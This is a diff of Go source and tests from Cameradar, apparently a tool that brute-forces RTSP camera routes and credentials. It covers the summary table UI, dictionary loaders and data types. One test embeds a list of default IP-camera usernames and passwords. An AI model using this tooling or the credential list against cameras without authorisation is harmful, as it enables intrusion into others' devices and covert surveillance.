|
||||
}
|
||||
if m.progressCounts[step] < m.progressTotals[step] {
|
||||
m.progressCounts[step] = m.progressTotals[step]
|
||||
}
|
||||
}
|
||||
|
||||
func progressWidth(width int) int {
|
||||
if width <= 0 {
|
||||
return 28
|
||||
}
|
||||
if width < 60 {
|
||||
return 20
|
||||
}
|
||||
if width < 100 {
|
||||
return 28
|
||||
}
|
||||
return 36
|
||||
}
|
||||
|
||||
func buildSummaryTables(streams []cameradar.Stream, width int, status map[cameradar.Step]state, maxRows int) []summaryTable {
|
||||
visibility := summaryVisibility(status)
|
||||
accessible, others := partitionStreams(streams)
|
||||
rows := append(buildSummaryRows(accessible, visibility), buildSummaryRows(others, visibility)...)
|
||||
if len(rows) == 0 {
|
||||
rows = []table.Row{emptySummaryRow()}
|
||||
}
|
||||
|
||||
if maxRows > 0 {
|
||||
switch {
|
||||
case len(rows) > maxRows:
|
||||
if maxRows == 1 {
|
||||
rows = []table.Row{summaryOverflowRow(len(rows))}
|
||||
} else {
|
||||
visibleRows := maxRows - 1
|
||||
hidden := len(rows) - visibleRows
|
||||
rows = append(rows[:visibleRows], summaryOverflowRow(hidden))
|
||||
}
|
||||
case len(rows) < maxRows:
|
||||
rows = padSummaryRows(rows, maxRows)
|
||||
}
|
||||
}
|
||||
|
||||
columns := summaryColumns(width, rows)
|
||||
model := table.New(
|
||||
table.WithColumns(columns),
|
||||
table.WithRows(rows),
|
||||
table.WithFocused(false),
|
||||
table.WithHeight(len(rows)),
|
||||
)
|
||||
model.SetStyles(summaryTableStyles())
|
||||
|
||||
return []summaryTable{{table: model}}
|
||||
}
|
||||
|
||||
func renderSummaryTitle(streams []cameradar.Stream) string {
|
||||
accessible, _ := partitionStreams(streams)
|
||||
return fmt.Sprintf("Summary - Streams (%d accessible / %d total)", len(accessible), len(streams))
|
||||
}
|
||||
|
||||
func summaryStatusAllDone() map[cameradar.Step]state {
|
||||
status := make(map[cameradar.Step]state)
|
||||
for _, step := range cameradar.Steps() {
|
||||
status[step] = stateDone
|
||||
}
|
||||
return status
|
||||
}
|
||||
|
||||
const emptyEntry = "—"
|
||||
|
||||
func emptySummaryRow() table.Row {
|
||||
row := make(table.Row, summaryColumnCount)
|
||||
for i := range row {
|
||||
row[i] = emptyEntry
|
||||
}
|
||||
return row
|
||||
}
|
||||
|
||||
func padSummaryRows(rows []table.Row, maxRows int) []table.Row {
|
||||
for len(rows) < maxRows {
|
||||
rows = append(rows, emptySummaryRow())
|
||||
}
|
||||
return rows
|
||||
}
|
||||
|
||||
func summaryOverflowRow(hidden int) table.Row {
|
||||
row := emptySummaryRow()
|
||||
if hidden <= 0 {
|
||||
return row
|
||||
}
|
||||
label := "\u2026 1 more stream"
|
||||
if hidden > 1 {
|
||||
label = fmt.Sprintf("\u2026 %d more streams", hidden)
|
||||
}
|
||||
row[0] = label
|
||||
return row
|
||||
}
|
||||
|
||||
func renderSummaryTablePlain(columns []table.Column, rows []table.Row) string {
|
||||
colWidths := make([]int, len(columns))
|
||||
for i, col := range columns {
|
||||
colWidths[i] = max(col.Width, len([]rune(col.Title)))
|
||||
}
|
||||
|
||||
var builder strings.Builder
|
||||
builder.WriteString(renderSummaryBorder("┌", "┬", "┐", colWidths))
|
||||
builder.WriteString("\n")
|
||||
builder.WriteString(renderSummaryRow(columnTitles(columns), colWidths))
|
||||
builder.WriteString("\n")
|
||||
builder.WriteString(renderSummaryBorder("├", "┼", "┤", colWidths))
|
||||
for _, row := range rows {
|
||||
builder.WriteString("\n")
|
||||
builder.WriteString(renderSummaryRow(row, colWidths))
|
||||
}
|
||||
builder.WriteString("\n")
|
||||
builder.WriteString(renderSummaryBorder("└", "┴", "┘", colWidths))
|
||||
return builder.String()
|
||||
}
|
||||
|
||||
func renderSummaryBorder(left, middle, right string, widths []int) string {
|
||||
parts := make([]string, 0, len(widths))
|
||||
for _, width := range widths {
|
||||
parts = append(parts, strings.Repeat("─", width+2))
|
||||
}
|
||||
return left + strings.Join(parts, middle) + right
|
||||
}
|
||||
|
||||
func renderSummaryRow(cells []string, widths []int) string {
|
||||
var builder strings.Builder
|
||||
builder.WriteString("│")
|
||||
for i, width := range widths {
|
||||
value := ""
|
||||
if i < len(cells) {
|
||||
value = cells[i]
|
||||
}
|
||||
builder.WriteString(" ")
|
||||
builder.WriteString(padAndTrim(value, width))
|
||||
builder.WriteString(" │")
|
||||
}
|
||||
return builder.String()
|
||||
}
|
||||
|
||||
func padAndTrim(value string, width int) string {
|
||||
if width <= 0 {
|
||||
return ""
|
||||
}
|
||||
runes := []rune(value)
|
||||
if len(runes) > width {
|
||||
return string(runes[:width])
|
||||
}
|
||||
if len(runes) < width {
|
||||
return string(runes) + strings.Repeat(" ", width-len(runes))
|
||||
}
|
||||
return value
|
||||
}
|
||||
|
||||
func columnTitles(columns []table.Column) []string {
|
||||
if len(columns) == 0 {
|
||||
return nil
|
||||
}
|
||||
titles := make([]string, len(columns))
|
||||
for i, col := range columns {
|
||||
titles[i] = col.Title
|
||||
}
|
||||
return titles
|
||||
}
|
||||
|
||||
func buildSummaryRows(streams []cameradar.Stream, visibility summaryVisibilityState) []table.Row {
|
||||
rows := make([]table.Row, 0, len(streams))
|
||||
for _, stream := range streams {
|
||||
target := fmt.Sprintf("%s:%d", stream.Address.String(), stream.Port)
|
||||
device := emptyEntry
|
||||
if visibility.showDevice && stream.Device != "" {
|
||||
device = stream.Device
|
||||
}
|
||||
|
||||
routes := emptyEntry
|
||||
if visibility.showRoutes && len(stream.Routes) > 0 {
|
||||
routes = strings.Join(stream.Routes, ", ")
|
||||
}
|
||||
|
||||
credentials := emptyEntry
|
||||
if visibility.showCredentials && stream.CredentialsFound {
|
||||
credentials = fmt.Sprintf("%s:%s", stream.Username, stream.Password)
|
||||
}
|
||||
|
||||
available := emptyEntry
|
||||
if visibility.showAvailable {
|
||||
available = "no"
|
||||
if stream.Available {
|
||||
available = "yes"
|
||||
}
|
||||
}
|
||||
|
||||
rtspURL := emptyEntry
|
||||
if visibility.showCredentials && stream.RouteFound && stream.CredentialsFound {
|
||||
rtspURL = formatRTSPURL(stream)
|
||||
}
|
||||
|
||||
authType := emptyEntry
|
||||
if visibility.showAuth {
|
||||
authType = authTypeLabel(stream.AuthenticationType)
|
||||
}
|
||||
|
||||
rows = append(rows, table.Row{
|
||||
target,
|
||||
device,
|
||||
authType,
|
||||
routes,
|
||||
credentials,
|
||||
available,
|
||||
rtspURL,
|
||||
adminPanelLabel(stream, visibility),
|
||||
})
|
||||
}
|
||||
|
||||
return rows
|
||||
}
|
||||
|
||||
func summaryColumns(width int, rows []table.Row) []table.Column {
|
||||
columns := []table.Column{
|
||||
{Title: "Target", Width: 18},
|
||||
{Title: "Device", Width: 14},
|
||||
{Title: "Auth", Width: 8},
|
||||
{Title: "Routes", Width: 18},
|
||||
{Title: "Credentials", Width: 16},
|
||||
{Title: "Available", Width: 9},
|
||||
{Title: "RTSP URL", Width: 30},
|
||||
{Title: "Admin", Width: 24},
|
||||
}
|
||||
columns[6].Width = maxColumnWidth(columns[6].Title, rows, 6, columns[6].Width)
|
||||
columns[7].Width = maxColumnWidth(columns[7].Title, rows, 7, columns[7].Width)
|
||||
|
||||
if width <= 0 {
|
||||
return columns
|
||||
}
|
||||
|
||||
columns = clampColumns(columns, max(width-2, 60))
|
||||
|
||||
return columns
|
||||
}
|
||||
|
||||
func clampColumns(columns []table.Column, maxWidth int) []table.Column {
|
||||
padding := 2 * len(columns)
|
||||
contentWidth := 0
|
||||
for _, col := range columns {
|
||||
contentWidth += col.Width
|
||||
}
|
||||
contentWidth += padding
|
||||
if contentWidth <= maxWidth {
|
||||
return columns
|
||||
}
|
||||
|
||||
over := contentWidth - maxWidth
|
||||
shrinkOrder := []int{7, 3, 4, 1}
|
||||
minWidths := map[int]int{
|
||||
7: 10,
|
||||
3: 10,
|
||||
4: 10,
|
||||
1: 10,
|
||||
}
|
||||
for over > 0 {
|
||||
changed := false
|
||||
for _, idx := range shrinkOrder {
|
||||
minWidth := minWidths[idx]
|
||||
if columns[idx].Width > minWidth {
|
||||
columns[idx].Width--
|
||||
over--
|
||||
changed = true
|
||||
if over == 0 {
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
if !changed {
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
return columns
|
||||
}
|
||||
|
||||
func summaryTableStyles() table.Styles {
|
||||
styles := table.DefaultStyles()
|
||||
styles.Header = styles.Header.
|
||||
BorderStyle(lipgloss.NormalBorder()).
|
||||
BorderForeground(lipgloss.Color("240")).
|
||||
BorderBottom(true).
|
||||
Bold(true)
|
||||
styles.Selected = lipgloss.NewStyle()
|
||||
styles.Cell = styles.Cell.Padding(0, 1)
|
||||
return styles
|
||||
}
|
||||
|
||||
func maxColumnWidth(title string, rows []table.Row, idx, minWidth int) int {
|
||||
width := max(len(title), minWidth)
|
||||
for _, row := range rows {
|
||||
if idx >= len(row) {
|
||||
continue
|
||||
}
|
||||
if len(row[idx]) > width {
|
||||
width = len(row[idx])
|
||||
}
|
||||
}
|
||||
return width
|
||||
}
|
||||
|
||||
func adminPanelLabel(stream cameradar.Stream, visibility summaryVisibilityState) string {
|
||||
if !visibility.showCredentials || !stream.CredentialsFound {
|
||||
return emptyEntry
|
||||
}
|
||||
return formatAdminPanelURL(stream)
|
||||
}
|
||||
|
||||
type summaryVisibilityState struct {
|
||||
showDevice bool
|
||||
showRoutes bool
|
||||
showAuth bool
|
||||
showCredentials bool
|
||||
showAvailable bool
|
||||
}
|
||||
|
||||
func summaryVisibility(status map[cameradar.Step]state) summaryVisibilityState {
|
||||
return summaryVisibilityState{
|
||||
showDevice: stepComplete(status, cameradar.StepScan),
|
||||
showRoutes: stepComplete(status, cameradar.StepAttackRoutes),
|
||||
showAuth: stepComplete(status, cameradar.StepDetectAuth),
|
||||
showCredentials: stepComplete(status, cameradar.StepAttackCredentials),
|
||||
showAvailable: stepComplete(status, cameradar.StepValidateStreams),
|
||||
}
|
||||
}
|
||||
|
||||
func stepComplete(status map[cameradar.Step]state, step cameradar.Step) bool {
|
||||
if status == nil {
|
||||
return false
|
||||
}
|
||||
switch status[step] {
|
||||
case stateDone, stateError:
|
||||
return true
|
||||
default:
|
||||
return false
|
||||
}
|
||||
}
|
||||
|
||||
func copyStreams(streams []cameradar.Stream) []cameradar.Stream {
|
||||
if len(streams) == 0 {
|
||||
return nil
|
||||
}
|
||||
|
||||
cloned := make([]cameradar.Stream, len(streams))
|
||||
copy(cloned, streams)
|
||||
return cloned
|
||||
}
|
||||
-109
@@ -1,109 +0,0 @@
|
||||
package cmrdr
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"encoding/json"
|
||||
"io"
|
||||
"io/ioutil"
|
||||
"os"
|
||||
"strings"
|
||||
|
||||
"github.com/pkg/errors"
|
||||
)
|
||||
|
||||
var fs fileSystem = osFS{}
|
||||
|
||||
type fileSystem interface {
|
||||
Open(name string) (file, error)
|
||||
Stat(name string) (os.FileInfo, error)
|
||||
}
|
||||
|
||||
type file interface {
|
||||
io.Closer
|
||||
io.Reader
|
||||
io.ReaderAt
|
||||
io.Seeker
|
||||
Stat() (os.FileInfo, error)
|
||||
}
|
||||
|
||||
// osFS implements fileSystem using the local disk.
|
||||
type osFS struct{}
|
||||
|
||||
func (osFS) Open(name string) (file, error) { return os.Open(name) }
|
||||
func (osFS) Stat(name string) (os.FileInfo, error) { return os.Stat(name) }
|
||||
|
||||
// LoadCredentials opens a dictionary file and returns its contents as a Credentials structure
|
||||
func LoadCredentials(path string) (Credentials, error) {
|
||||
var creds Credentials
|
||||
|
||||
// Open & Read XML file
|
||||
content, err := ioutil.ReadFile(path)
|
||||
if err != nil {
|
||||
return creds, errors.Wrap(err, "could not read credentials dictionary file at "+path+":")
|
||||
}
|
||||
|
||||
// Unmarshal content of JSON file into data structure
|
||||
err = json.Unmarshal(content, &creds)
|
||||
if err != nil {
|
||||
return creds, err
|
||||
}
|
||||
|
||||
return creds, nil
|
||||
}
|
||||
|
||||
// LoadRoutes opens a dictionary file and returns its contents as a Routes structure
|
||||
func LoadRoutes(path string) (Routes, error) {
|
||||
file, err := os.Open(path)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
defer file.Close()
|
||||
|
||||
var routes Routes
|
||||
scanner := bufio.NewScanner(file)
|
||||
|
||||
for scanner.Scan() {
|
||||
routes = append(routes, scanner.Text())
|
||||
}
|
||||
|
||||
return routes, scanner.Err()
|
||||
}
|
||||
|
||||
// ParseCredentialsFromString parses a dictionary string and returns its contents as a Credentials structure
|
||||
func ParseCredentialsFromString(content string) (Credentials, error) {
|
||||
var creds Credentials
|
||||
|
||||
// Unmarshal content of JSON file into data structure
|
||||
err := json.Unmarshal([]byte(content), &creds)
|
||||
if err != nil {
|
||||
return creds, err
|
||||
}
|
||||
|
||||
return creds, nil
|
||||
}
|
||||
|
||||
// ParseRoutesFromString parses a dictionary string and returns its contents as a Routes structure
|
||||
func ParseRoutesFromString(content string) Routes {
|
||||
return strings.Split(content, "\n")
|
||||
}
|
||||
|
||||
// ParseTargetsFile parses an input file containing hosts to targets
|
||||
func ParseTargetsFile(path string) ([]string, error) {
|
||||
_, err := fs.Stat(path)
|
||||
if err != nil {
|
||||
return []string{path}, nil
|
||||
}
|
||||
|
||||
file, err := fs.Open(path)
|
||||
if err != nil {
|
||||
return []string{path}, err
|
||||
}
|
||||
defer file.Close()
|
||||
|
||||
bytes, err := ioutil.ReadAll(file)
|
||||
if err != nil {
|
||||
return []string{path}, err
|
||||
}
|
||||
|
||||
return strings.Split(string(bytes), "\n"), nil
|
||||
}
|
||||
-428
@@ -1,428 +0,0 @@
|
||||
package cmrdr
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"fmt"
|
||||
"io/ioutil"
|
||||
"os"
|
||||
"testing"
|
||||
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/mock"
|
||||
)
|
||||
|
||||
// Setup Mock
|
||||
type mockedFS struct {
|
||||
osFS
|
||||
|
||||
fileExists bool
|
||||
openError bool
|
||||
|
||||
fileMock *fileMock
|
||||
|
||||
fileSize int64
|
||||
}
|
||||
|
||||
// fileMock mocks a file
|
||||
type fileMock struct {
|
||||
mock.Mock
|
||||
|
||||
readError bool
|
||||
|
||||
bytes.Buffer
|
||||
}
|
||||
|
||||
type mockedFileInfo struct {
|
||||
os.FileInfo
|
||||
}
|
||||
|
||||
func (m mockedFileInfo) Size() int64 { return 1 }
|
||||
|
||||
func (m mockedFS) Stat(name string) (os.FileInfo, error) {
|
||||
if !m.fileExists {
|
||||
return nil, os.ErrNotExist
|
||||
}
|
||||
return mockedFileInfo{}, nil
|
||||
}
|
||||
|
||||
func (m mockedFS) Open(name string) (file, error) {
|
||||
if m.openError {
|
||||
return nil, os.ErrNotExist
|
||||
}
|
||||
|
||||
return m.fileMock, nil
|
||||
}
|
||||
|
||||
func (m *fileMock) Read(p []byte) (n int, err error) {
|
||||
if m.readError {
|
||||
return 0, os.ErrNotExist
|
||||
}
|
||||
return m.Buffer.Read(p)
|
||||
}
|
||||
|
||||
func (m *fileMock) ReadAt(p []byte, off int64) (n int, err error) {
|
||||
return 1, nil
|
||||
}
|
||||
|
||||
func (m *fileMock) Seek(offset int64, whence int) (int64, error) {
|
||||
return offset, nil
|
||||
}
|
||||
|
||||
func (m *fileMock) Stat() (os.FileInfo, error) {
|
||||
return mockedFileInfo{}, nil
|
||||
}
|
||||
|
||||
// Close mock
|
||||
func (m *fileMock) Close() error {
|
||||
args := m.Called()
|
||||
return args.Error(0)
|
||||
}
|
||||
|
||||
// Sync mock
|
||||
func (m *fileMock) Sync() error {
|
||||
args := m.Called()
|
||||
return args.Error(0)
|
||||
}
|
||||
|
||||
func TestLoadCredentials(t *testing.T) {
|
||||
credentialsJSONString := []byte("{\"usernames\":[\"admin\",\"root\"],\"passwords\":[\"12345\",\"root\"]}")
|
||||
validCredentials := Credentials{
|
||||
Usernames: []string{"admin", "root"},
|
||||
Passwords: []string{"12345", "root"},
|
||||
}
|
||||
|
||||
testCases := []struct {
|
||||
input []byte
|
||||
fileExists bool
|
||||
|
||||
expectedOutput Credentials
|
||||
expectedErrMsg string
|
||||
}{
|
||||
// Valid baseline
|
||||
{
|
||||
fileExists: true,
|
||||
input: credentialsJSONString,
|
||||
expectedOutput: validCredentials,
|
||||
},
|
||||
// File does not exist
|
||||
{
|
||||
fileExists: false,
|
||||
input: credentialsJSONString,
|
||||
expectedErrMsg: "could not read credentials dictionary file at",
|
||||
},
|
||||
// Invalid format
|
||||
{
|
||||
fileExists: true,
|
||||
input: []byte("not json"),
|
||||
expectedErrMsg: "invalid character",
|
||||
},
|
||||
// No streams in dictionary
|
||||
{
|
||||
fileExists: true,
|
||||
input: []byte("{\"invalid\":\"json\"}"),
|
||||
},
|
||||
}
|
||||
|
||||
for i, test := range testCases {
|
||||
filePath := "/tmp/cameradar_test_load_credentials_" + fmt.Sprint(i) + ".xml"
|
||||
// create file
|
||||
if test.fileExists {
|
||||
_, err := os.Create(filePath)
|
||||
if err != nil {
|
||||
fmt.Printf("could not create xml file for LoadCredentials: %v. iteration: %d. file path: %s\n", err, i, filePath)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
err = ioutil.WriteFile(filePath, test.input, 0644)
|
||||
if err != nil {
|
||||
fmt.Printf("could not write xml file for LoadCredentials: %v. iteration: %d. file path: %s\n", err, i, filePath)
|
||||
os.Exit(1)
|
||||
}
|
||||
}
|
||||
|
||||
result, err := LoadCredentials(filePath)
|
||||
if len(test.expectedErrMsg) > 0 {
|
||||
if err == nil {
|
||||
fmt.Printf("unexpected success in LoadCredentials test, iteration %d. expected error: %s\n", i, test.expectedErrMsg)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
assert.Contains(t, err.Error(), test.expectedErrMsg, "wrong error message")
|
||||
} else {
|
||||
if err != nil {
|
||||
fmt.Printf("unexpected error in LoadCredentials test, iteration %d: %v\n", i, err)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
for _, expectedUsername := range test.expectedOutput.Usernames {
|
||||
foundUsername := false
|
||||
for _, username := range result.Usernames {
|
||||
if username == expectedUsername {
|
||||
foundUsername = true
|
||||
}
|
||||
}
|
||||
|
||||
assert.Equal(t, true, foundUsername, "wrong usernames parsed")
|
||||
}
|
||||
|
||||
for _, expectedPassword := range test.expectedOutput.Passwords {
|
||||
foundPassword := false
|
||||
for _, password := range result.Passwords {
|
||||
if password == expectedPassword {
|
||||
foundPassword = true
|
||||
}
|
||||
}
|
||||
|
||||
assert.Equal(t, true, foundPassword, "wrong passwords parsed")
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestLoadRoutes(t *testing.T) {
|
||||
routesJSONString := []byte("admin\nroot")
|
||||
validRoutes := Routes{"admin", "root"}
|
||||
|
||||
testCases := []struct {
|
||||
input []byte
|
||||
fileExists bool
|
||||
|
||||
expectedOutput Routes
|
||||
expectedErrMsg string
|
||||
}{
|
||||
// Valid baseline
|
||||
{
|
||||
fileExists: true,
|
||||
input: routesJSONString,
|
||||
expectedOutput: validRoutes,
|
||||
},
|
||||
// File does not exist
|
||||
{
|
||||
fileExists: false,
|
||||
input: routesJSONString,
|
||||
expectedErrMsg: "no such file or directory",
|
||||
},
|
||||
// No streams in dictionary
|
||||
{
|
||||
fileExists: true,
|
||||
input: []byte(""),
|
||||
},
|
||||
}
|
||||
|
||||
for i, test := range testCases {
|
||||
filePath := "/tmp/cameradar_test_load_routes_" + fmt.Sprint(i) + ".xml"
|
||||
|
||||
// create file
|
||||
if test.fileExists {
|
||||
_, err := os.Create(filePath)
|
||||
if err != nil {
|
||||
fmt.Printf("could not create xml file for LoadRoutes: %v. iteration: %d. file path: %s\n", err, i, filePath)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
err = ioutil.WriteFile(filePath, test.input, 0644)
|
||||
if err != nil {
|
||||
fmt.Printf("could not write xml file for LoadRoutes: %v. iteration: %d. file path: %s\n", err, i, filePath)
|
||||
os.Exit(1)
|
||||
}
|
||||
}
|
||||
|
||||
result, err := LoadRoutes(filePath)
|
||||
if len(test.expectedErrMsg) > 0 {
|
||||
if err == nil {
|
||||
fmt.Printf("unexpected success in LoadRoutes test, iteration %d. expected error: %s\n", i, test.expectedErrMsg)
|
||||
os.Exit(1)
|
||||
}
|
||||
assert.Contains(t, err.Error(), test.expectedErrMsg, "wrong error message")
|
||||
} else {
|
||||
if err != nil {
|
||||
fmt.Printf("unexpected error in LoadRoutes test, iteration %d: %v\n", i, err)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
for _, expectedRoute := range test.expectedOutput {
|
||||
foundRoute := false
|
||||
for _, route := range result {
|
||||
if route == expectedRoute {
|
||||
foundRoute = true
|
||||
}
|
||||
}
|
||||
|
||||
assert.Equal(t, true, foundRoute, "wrong routes parsed")
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestParseCredentialsFromString(t *testing.T) {
|
||||
defaultCredentials := Credentials{
|
||||
Usernames: []string{
|
||||
"",
|
||||
"admin",
|
||||
"Admin",
|
||||
"Administrator",
|
||||
"root",
|
||||
"supervisor",
|
||||
"ubnt",
|
||||
"service",
|
||||
"Dinion",
|
||||
"administrator",
|
||||
"admin1",
|
||||
},
|
||||
Passwords: []string{
|
||||
"",
|
||||
"admin",
|
||||
"9999",
|
||||
"123456",
|
||||
"pass",
|
||||
"camera",
|
||||
"1234",
|
||||
"12345",
|
||||
"fliradmin",
|
||||
"system",
|
||||
"jvc",
|
||||
"meinsm",
|
||||
"root",
|
||||
"4321",
|
||||
"111111",
|
||||
"1111111",
|
||||
"password",
|
||||
"ikwd",
|
||||
"supervisor",
|
||||
"ubnt",
|
||||
"wbox123",
|
||||
"service",
|
||||
},
|
||||
}
|
||||
|
||||
testCases := []struct {
|
||||
str string
|
||||
expectedResult Credentials
|
||||
}{
|
||||
{
|
||||
str: "{\"usernames\":[\"\",\"admin\",\"Admin\",\"Administrator\",\"root\",\"supervisor\",\"ubnt\",\"service\",\"Dinion\",\"administrator\",\"admin1\"],\"passwords\":[\"\",\"admin\",\"9999\",\"123456\",\"pass\",\"camera\",\"1234\",\"12345\",\"fliradmin\",\"system\",\"jvc\",\"meinsm\",\"root\",\"4321\",\"111111\",\"1111111\",\"password\",\"ikwd\",\"supervisor\",\"ubnt\",\"wbox123\",\"service\"]}",
|
||||
expectedResult: defaultCredentials,
|
||||
},
|
||||
{
|
||||
str: "{}",
|
||||
expectedResult: Credentials{},
|
||||
},
|
||||
{
|
||||
str: "{\"invalid_field\":42}",
|
||||
expectedResult: Credentials{},
|
||||
},
|
||||
{
|
||||
str: "not json",
|
||||
expectedResult: Credentials{},
|
||||
},
|
||||
}
|
||||
for _, test := range testCases {
|
||||
parsedCredentials, _ := ParseCredentialsFromString(test.str)
|
||||
assert.Equal(t, test.expectedResult, parsedCredentials, "unexpected result, parse error")
|
||||
}
|
||||
}
|
||||
|
||||
func TestParseRoutesFromString(t *testing.T) {
|
||||
testCases := []struct {
|
||||
str string
|
||||
expectedResult Routes
|
||||
}{
|
||||
{
|
||||
str: "a\nb\nc",
|
||||
expectedResult: []string{"a", "b", "c"},
|
||||
},
|
||||
{
|
||||
str: "a",
|
||||
expectedResult: []string{"a"},
|
||||
},
|
||||
{
|
||||
str: "",
|
||||
expectedResult: []string{""},
|
||||
},
|
||||
}
|
||||
for _, test := range testCases {
|
||||
parsedRoutes := ParseRoutesFromString(test.str)
|
||||
assert.Equal(t, test.expectedResult, parsedRoutes, "unexpected result, parse error")
|
||||
}
|
||||
}
|
||||
|
||||
func TestParseTargetsFile(t *testing.T) {
|
||||
|
||||
oldFS := fs
|
||||
mfs := &mockedFS{}
|
||||
fs = mfs
|
||||
defer func() {
|
||||
fs = oldFS
|
||||
}()
|
||||
|
||||
testCases := []struct {
|
||||
input string
|
||||
|
||||
fileExists bool
|
||||
openError bool
|
||||
readError bool
|
||||
|
||||
expectedResult []string
|
||||
expectedError error
|
||||
}{
|
||||
{
|
||||
input: "0.0.0.0",
|
||||
|
||||
fileExists: false,
|
||||
|
||||
expectedResult: []string{"0.0.0.0"},
|
||||
expectedError: nil,
|
||||
},
|
||||
{
|
||||
input: "test_does_not_really_exist",
|
||||
|
||||
fileExists: true,
|
||||
|
||||
expectedResult: []string{"0.0.0.0", "localhost", "192.17.0.0/16", "192.168.1.140-255", "192.168.2-3.0-255"},
|
||||
expectedError: nil,
|
||||
},
|
||||
{
|
||||
input: "test_does_not_really_exist",
|
||||
|
||||
fileExists: true,
|
||||
openError: true,
|
||||
|
||||
expectedResult: []string{"test_does_not_really_exist"},
|
||||
expectedError: os.ErrNotExist,
|
||||
},
|
||||
{
|
||||
input: "test_does_not_really_exist",
|
||||
|
||||
fileExists: true,
|
||||
readError: true,
|
||||
|
||||
expectedResult: []string{"test_does_not_really_exist"},
|
||||
expectedError: os.ErrNotExist,
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range testCases {
|
||||
mfs.fileExists = test.fileExists
|
||||
mfs.openError = test.openError
|
||||
|
||||
mfs.fileMock = &fileMock{
|
||||
readError: test.readError,
|
||||
}
|
||||
mfs.fileMock.On("Close").Return(nil)
|
||||
mfs.fileMock.WriteString("0.0.0.0\nlocalhost\n192.17.0.0/16\n192.168.1.140-255\n192.168.2-3.0-255")
|
||||
|
||||
result, err := ParseTargetsFile(test.input)
|
||||
assert.Equal(t, test.expectedResult, result, "unexpected result, parse error")
|
||||
assert.Equal(t, test.expectedError, err, "unexpected error")
|
||||
}
|
||||
}
|
||||
|
||||
// This is completely useless and just lets me
|
||||
// not look at these two red lines on the coverage
|
||||
// any longer.
|
||||
func TestFS(t *testing.T) {
|
||||
fs := osFS{}
|
||||
|
||||
fs.Open("test")
|
||||
fs.Stat("test")
|
||||
}
|
||||
@@ -1,39 +0,0 @@
|
||||
package cmrdr
|
||||
|
||||
import "time"
|
||||
|
||||
// Stream represents a camera's RTSP stream
|
||||
type Stream struct {
|
||||
Device string `json:"device"`
|
||||
Username string `json:"username"`
|
||||
Password string `json:"password"`
|
||||
Route string `json:"route"`
|
||||
Address string `json:"address" validate:"required"`
|
||||
Port uint16 `json:"port" validate:"required"`
|
||||
|
||||
CredentialsFound bool `json:"credentials_found"`
|
||||
RouteFound bool `json:"route_found"`
|
||||
Available bool `json:"available"`
|
||||
}
|
||||
|
||||
// Credentials is a map of credentials
|
||||
// usernames are keys and passwords are values
|
||||
// creds['admin'] -> 'secure_password'
|
||||
type Credentials struct {
|
||||
Usernames []string `json:"usernames"`
|
||||
Passwords []string `json:"passwords"`
|
||||
}
|
||||
|
||||
// Routes is a slice of Routes
|
||||
// ['/live.sdp', '/media.amp', ...]
|
||||
type Routes []string
|
||||
|
||||
// Options contains all options needed to launch a complete cameradar scan
|
||||
type Options struct {
|
||||
Targets []string `json:"target" validate:"required"`
|
||||
Ports []string `json:"ports"`
|
||||
Routes Routes `json:"routes"`
|
||||
Credentials Credentials `json:"credentials"`
|
||||
Speed int `json:"speed"`
|
||||
Timeout time.Duration `json:"timeout"`
|
||||
}
|
||||
+40
@@ -0,0 +1,40 @@
|
||||
package cameradar
|
||||
|
||||
import (
|
||||
"strconv"
|
||||
"strings"
|
||||
)
|
||||
|
||||
const progressMessagePrefix = "\x00progress:"
|
||||
|
||||
// ProgressTotalMessage returns a progress control message that sets the total units for a step.
|
||||
func ProgressTotalMessage(total int) string {
|
||||
return progressMessagePrefix + "total=" + strconv.Itoa(total)
|
||||
}
|
||||
|
||||
// ProgressTickMessage returns a progress control message that increments a step's progress by one unit.
|
||||
func ProgressTickMessage() string {
|
||||
return progressMessagePrefix + "tick"
|
||||
}
|
||||
|
||||
// ParseProgressMessage parses a progress control message.
|
||||
// It returns a kind of "total" or "tick" and an optional value.
|
||||
func ParseProgressMessage(message string) (string, int, bool) {
|
||||
if !strings.HasPrefix(message, progressMessagePrefix) {
|
||||
return "", 0, false
|
||||
}
|
||||
|
||||
payload := strings.TrimPrefix(message, progressMessagePrefix)
|
||||
if payload == "tick" {
|
||||
return "tick", 1, true
|
||||
}
|
||||
if valuePart, ok := strings.CutPrefix(payload, "total="); ok {
|
||||
value, err := strconv.Atoi(valuePart)
|
||||
if err != nil {
|
||||
return "", 0, false
|
||||
}
|
||||
return "total", value, true
|
||||
}
|
||||
|
||||
return "", 0, false
|
||||
}
|
||||
@@ -0,0 +1,40 @@
|
||||
package cameradar
|
||||
|
||||
import (
|
||||
"net/netip"
|
||||
)
|
||||
|
||||
// AuthType represents the RTSP authentication method.
|
||||
type AuthType int
|
||||
|
||||
// Supported authentication methods.
|
||||
const (
|
||||
AuthUnknown AuthType = iota
|
||||
AuthNone
|
||||
AuthBasic
|
||||
AuthDigest
|
||||
)
|
||||
|
||||
// Stream represents a camera's RTSP stream.
|
||||
type Stream struct {
|
||||
Device string `json:"device"`
|
||||
Username string `json:"username"`
|
||||
Password string `json:"password"`
|
||||
Routes []string `json:"route"`
|
||||
Address netip.Addr `json:"address" validate:"required"`
|
||||
Port uint16 `json:"port" validate:"required"`
|
||||
|
||||
CredentialsFound bool `json:"credentials_found"`
|
||||
RouteFound bool `json:"route_found"`
|
||||
Available bool `json:"available"`
|
||||
|
||||
AuthenticationType AuthType `json:"authentication_type"`
|
||||
}
|
||||
|
||||
// Route returns this stream's route if there is one.
|
||||
func (s Stream) Route() string {
|
||||
if len(s.Routes) > 0 {
|
||||
return s.Routes[0]
|
||||
}
|
||||
return ""
|
||||
}
|
||||
@@ -0,0 +1,74 @@
|
||||
package cameradar
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"strings"
|
||||
)
|
||||
|
||||
